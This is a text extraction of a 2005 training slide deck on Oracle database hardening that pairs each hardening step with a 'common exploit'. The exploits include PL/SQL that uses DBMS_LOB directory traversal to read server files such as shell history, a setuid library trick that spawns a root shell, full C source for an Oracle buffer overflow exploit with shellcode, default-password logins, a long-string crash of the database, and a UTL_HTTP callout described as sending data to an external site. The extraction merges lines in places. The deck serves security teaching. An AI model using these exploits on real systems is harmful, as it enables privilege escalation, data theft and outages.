oracle database basic hardening and common exploits€¦ · · 2009-05-07red-database-security...

Alexander Kornbrust, 26-Sep-2005 V1.00 1Red-Database-Security GmbH

IT Summerschool RWTH Aachen

Oracle Database Basic Hardening & Common Exploits

Alexander Kornbrust26-September-2005


Table of content

• Apply latest security patches• X11 security• Cleartext passwords• File permission & settings• Listener security• External users• Default passwords• Mighty packages• Password Verify Function• Oracle profile• System tablespace• Init.ora settings


Apply latest security patches

• 8.1.7.4• 9.1.0.5• 9.2.0.6• 9.2.0.7• 10.1.0.2• 10.1.0.3• 10.1.0.4• 10.2.0.1• Common Exploits are available on the internet.

Apply latest security patches on top of the latest patchsets


X11 Security

The Oracle documentation (until 10.2) recommends to run the xhost+ command before you start the installation.

Never use xhost+ because it opens the server to everyone.

Solution

• Make use of any access control mechanisms provided by the operating system and window system to prevent theft of workstation display contents or keystrokes

• Inform users to not use the 'xhost +' command and/or disable it

• Check for xsessions files with 'xhost +' enabled and stop doing this

• Disable broadcast and/or indirect XDM requests for any X terminals that you don't explicitly want to support


References for X11 Security

• Crash Course in X Windows Security ( http://www.hack.gr/users/atlantis/windows.html )

• Safely Using the X Window System and "Securing X Windows" by John Fisher of CIAC


Common Exploits for X11

• Read keyboard (see DVD: xkey.c)

• Dump X11 windows


Unix-history files (.bash_history/.sh_history) often contain command lines with cleartextpasswords (e.g. sqlplus system/secretpw).

Solution

Edit the history files on a regular basis and remove the passwords.

Cleartext Passwords


Common Exploit

Read Unix-History files via utl_file or dbms_lob and directory traversalBEGIN

Lob_loc:= BFILENAME('MEDIA_DIR', '../../../.sh_history');DBMS_LOB.OPEN (Lob_loc, DBMS_LOB.LOB_READONLY);

LOOPDBMS_LOB.READ (Lob_loc, Amount, Position, Buffer);dbms_output.putline(utl_raw.cast_to_varchar2(Buffer));Position := Position + Amount;

END LOOP;

END IF;

DBMS_LOB.CLOSE (Lob_loc);

END;


Remove cleartext passwords from the environment.If an attacker compromise a system he get the passwords easily (set command).

SolutionRewrite your scripts and never use plaintext

passwords in the environment.

Cleartext Passwords in environment


Common Exploit

http://server/fcgi-bin/echo.exe


Common Exploit

Run an operating system command (e.g. env or set) from SQL*Plus via extproc or Java


Executables with s-bits

Remove s-bits from oracle filese.g. dbsnmp

Solution1. Search files with s-bits

find . -type f -perm -4000 -print2. Remove s-bit

chmod –s dbsnmp


Common Exploit (become root)

----[ora9i]$ ldd ./bin/dbsnmp

libvppdc.so => /export/home/iasr2/ora9ias_mid/lib/libvppdc.so libclntsh.so.9.0 => /export/home/iasr2/ora9ias_mid/lib/libclntsh.so.9.0libwtc9.so => /export/home/iasr2/ora9ias_mid/lib//libwtc9.so libthread.so.1 => /usr/lib/libthread.so.1libkstat.so.1 => /usr/lib/libkstat.so.1....

Erzeugen einer neuen Library, die von dbsnmp verwendet wird:#include#include

_init() { printf("PID=%i EUID=%i",getpid(),getuid());setuid(0);system("/usr/bin/ksh");}


Remove x-executable from the Oracle executables for all users. The Oracle executable has a s-bit and some versions are vulnerable against a buffer overflow (exploit available via internet)

Solution

chmod o-x oracle

Execution Permission


Common Exploit 1:#################include <stdio.h>#include <stdlib.h> #include <string.h> #include <unistd.h> #define VER "Operation_Oracle_Owner_Ownage_Overflow_Oday Version 1.0.1" #define PADDING 0x90 #define RIMSHOT 9850 //#define BUFF 15000 char oracle_crusher_char[] = "\x31\xc0\xb0\x01\xcd\x80"; unsigned long retrieve_offset() { __asm__("movl %esp, %eax"); } int main(int argc, char *argv[]) { char Bucket[RIMSHOT]; long badd_addr; short delta = 0; short i; if(argc > 1) { delta = atol(argv[1]); } badd_addr = retrieve_offset() - delta; printf("\n\n*************************************************************\n"


Common Exploit 1:

"*************************************************************\n"); printf("[-] %s\n", VER); printf("[-] Bug discovered and PoC developed by c0ntexhushmail.com.\n" "[-] --------------------------------------------------------\n" "[-] Fresh 0day PoC oracle && oracleO buffer overflow exploit\n" "[-] Offset values from 1750 - 3500 should work perfectly, k.\n" "[-] Run it and ltrace -o outout ./oracle_owned for goodness.\n" "[-] --------------------------------------------------------\n" "[-] gcc -Wall -o oracle_owned oracle_owned.c\n" "[-] --------------------------------------------------------\n" "[-] Usage: %s offset_value\n", argv[0]); for(i = 0; i < RIMSHOT; i += 4) *(long *) &Bucket[i] = badd_addr; for(i = 0; i < (RIMSHOT - strlen(oracle_crusher_char) - 100); i++) *(Bucket + i) = PADDING; memcpy(Bucket + i, oracle_crusher_char, strlen(oracle_crusher_char)); printf("[-] Using Return address 0x%lx\n", badd_addr); printf("[-] Using offset value %d\n", delta); printf("*************************************************************\n" "*************************************************************\n\n"); execlp("/database/u00/app/oracle/product/9.2.0.1.0/bin/oracle", "oracle", Bucket, NULL); return 0; }################


Remove old versions

Remove old, vulnerable executables/libraries

• dbsnmp0• oracle0

Solutionrm dbsnmp0


Check file and directory permission on a regular base

Oracle recommends to set the umask=022. The result of this setting is a world readable export file.

Very often these (full) export files contain the entire database

drwxr-xr-x 2 oracle dba 512 Apr 23 09:00 .drwxr-xr-x 4 oracle dba 512 Apr 18 2004 ..-rw-r--r-- 1 oracle dba 22439264450 Aug 23 05:24 full_export.dmp

Check file permission


Common Exploit

Copy dump-files from the Oracle-Home directory

#johndoe> cp /home/oracle/dump/full_export.dmp ~/.


Remove sources and application code from the database server to avoid hints for the developer

Remove unneeded sources


Securing TNS Listener

• Set Listener Password (up to 9i Rel.2)

• Set ADMIN_RESTRICTIONS

• Remove unneeded Services


Common Exploits

• Stop listener via lsnrctl Stop

• Change listener.log name to .rhosts and send a specially crafted tns packet

Details see presentation “Listener Security”


External (OPS$) user

For historical reasons Oracle still supports externalusers. These database users are authenticated by theoperating system.

Anyone with access to an external O/S account (e.g. boot Linux from a boot-CD) can access the databasewithout further authentication.

TO use this the init.ora-parameterREMOTE_IS_AUTHENT must be TRUE.

If REMOTE_IS_AUTHENT is FALSE is used for trustedconnections like ASO (Radius), Windows, …


Common Exploit

Create different OS accounts like oracle, admin, administrator …and login from thise operating system account.


Remove Default Passwords

• outln/outln• dbsnmp/dbsnmp• system/manager• sys/change_on_install• scott/tiger

Solution - change database passwords:alter user outln identified by my!top112123;

Password is transferred in plaintext over the network

Better solution in SQL*PlusSQL> passwords outln

Or use Oracle Advanced Security (ASO)


Common Exploit 1

Connect with default password and escalate privileges

sqlplus scott/tiger@db

sqlplus system/manager@db

sqlplus sys/change_on_install@db

sqlplus outln/outln@db


Common Exploit 2

Sniff passwords the trace file functionality.

TRACE_FILE_SERVER=training.trcTRACE_DIRECTORY_SERVER=c:\tempTRACE_LEVEL_SERVER=SUPPORT

SQL> alter user scott identified by tiger;User altered.

[24-JUN-2005 13:11:20:527] nsprecv: 74 65 72 20 75 73 65 72 |ter.user|[24-JUN-2005 13:11:20:527] nsprecv: 20 73 63 6F 74 74 20 69 |.scott.i|[24-JUN-2005 13:11:20:527] nsprecv: 64 65 6E 74 69 66 69 65 |dentifie|[24-JUN-2005 13:11:20:527] nsprecv: 64 20 62 79 20 74 69 67 |d.by.tig|[24-JUN-2005 13:11:20:527] nsprecv: 65 72 01 00 00 00 01 00 |er......|


Common Exploit 2

Sniff passwords with ethereal


Connect:ALTER SESSIONCREATE CLUSTERCREATE DATABASE LINKCREATE SEQUENCECREATE SESSIONCREATE SYNONYMCREATE TABLECREATE VIEW

Resource:CREATE CLUSTERCREATE INDEXTYPECREATE OPERATORCREATE PROCEDURECREATE SEQUENCECREATE TABLECREATE TRIGGERCREATE TYPE

Sanitize default role Oracle (up to 10.1.x) CONNECT and RESOURCE

Sanitize Connect and Resource Role


Common Exploit

Crash the database with a bug in the create database link:SQL> create database link crash using 'iasdb11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd11111111111';2 3*Error in line 1:ORA-03113: end-of-file on communication channel


Use password verify function and assign this function to all profiles

SolutionModify and install the password verification function UTLPWDMG.sql and assign this function to the default profile.

SQL> alter profile default limit password_verify_function verify_function;

Password Verify Function


Enable Auditing for SYS and normal users

It is not possible to audit SYS in 8i and lower.

Solution

• audit session;• audit create user;• set value audit_sys_operations (init.ora/pfile) to TRUE

and restart the database


Remove Public Grants from mighty packages

• utl_http• utl_smtp• utl_tcp• utl_file• utl_inaddr• dbms_lob• dbms_export_extension• dbms_sql

Remove also mighty packages reachable via dblinks


Common Exploit 1

Many versions of Oracle utl_file and dbms_lobare vulnerable against directory traversal.Everybody with an Oracle account can read every file on the database serverBEGIN

Lob_loc:= BFILENAME('MEDIA_DIR', ‘myfile.txt'); DBMS_LOB.OPEN (Lob_loc, DBMS_LOB.LOB_READONLY);

LOOP DBMS_LOB.READ (Lob_loc, Amount, Position, Buffer);

dbms_output.putline(utl_raw.cast_to_varchar2(Buffer)); Position := Position + Amount; END LOOP;

END IF; DBMS_LOB.CLOSE (Lob_loc);

END;


Common Exploit 2

Send information to an external websiteSET serveroutput ON SIZE 40000 DECLARE

req utl_http.req; resp utl_http.resp; value VARCHAR2(1024);

BEGIN

utl_http.set_proxy('172.20.96.10:8080');

req := utl_http.begin_request('http://www.heise.de');utl_http.set_header(req, 'User-Agent', 'Mozilla/4.0'); resp := utl_http.get_response(req); LOOP utl_http.read_line(resp, value, TRUE); dbms_output.put_line(value); END LOOP; utl_http.end_response(resp);

EXCEPTIONWHEN utl_http.end_of_body THENutl_http.end_response(resp);

END;

Other options: Send information via DNS


Modify the profile for oracle users to avoid brute force and denial of service attacks.

Solution

SQL> ALTER PROFILE default LIMITFAILED_LOGIN_ATTEMPTS 5PASSWORD_VERIFY_FUNCTION verifiy_funcPASSWORD_LOCK_TIME 1/48PASSWORD_GRACE_TIME 10;

Brute Force Attacks


Common Exploits

• Brute force Oracle user accounts

• D.o.S. via concurrent users (to reach the limit “processes”). Create 300 (if processes=300) concurrent sessions.

oracle@raclinux1:~> sqlplus scott/tigerSQL*Plus: Release 9.0.2.6 – ProductionCopyright (c) 1982, 2003, Oracle. All rights reserved.

ERROR:ORA-00020: maximum number of processes (%s) exceeded


Check if the SYSTEM tablespace is used by users different than SYS/SYSTEM

SYSTEM tablespace


Common Exploit

Fill the system tablespace with garbage


Check if O7_DICTIONARY_ACCESSIBILITY is set to FALSE

SolutionSET O7_DICTIONARY_ACCESSIBILITY to FALSE

Check if SQL92_SECURITY is set to TRUE

SolutionSET SQL92_SECURITY to TRUE

Init.ora settings


Common Exploit

Read any data dictionary table if the permission „SELECT ANY TABLE“ is granted.


Check if MAX_DUMP_FILE_SIZE is not set to unlimited

Solution• good partition/file system design (trace and dump

files on a separate partition)• set MAX_DUMP_FILE_SIZE in the init.ora• alter session set max_dump_file_size=64M;

Init.ora settings


Common Exploit

An attacker could create a large dump file and fill the partition


Excercise

Excercise


Alexander Kornbrust

Red-Database-Security GmbHBliesstrasse 16D-66538 NeunkirchenGermany

Telefon: +49 (0)6821 – 95 17 637Fax: +49 (0)6821 – 91 27 354E-Mail: [email protected]

Contact

oracle database basic hardening and common exploits€¦ · · 2009-05-07red-database-security...

Documents